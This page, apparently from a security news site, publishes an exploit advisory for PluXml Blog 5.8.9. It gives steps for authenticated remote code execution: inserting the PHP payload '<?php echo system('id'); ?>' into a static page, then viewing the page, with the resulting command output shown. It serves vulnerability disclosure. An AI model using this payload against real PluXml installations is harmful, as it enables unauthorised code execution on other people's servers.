Ubuntu Security Notice USN-7089-6

Ubuntu Security Notice USN-7112-1

Ubuntu Security Notice USN-7111-1

Ubuntu Security Notice USN-7088-5

Ubuntu Security Notice USN-7089-5

PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.

    ## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)### Date: 2024-1-7### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://pluxml.org/### Version : 5.8.9### Tested on: https://www.softaculous.com/apps/cms/PluXml1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001    Payload : <?php echo system('id'); ?>2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

Headline

PluXml Blog 5.8.9 Remote Code Execution

Packet Storm: Latest News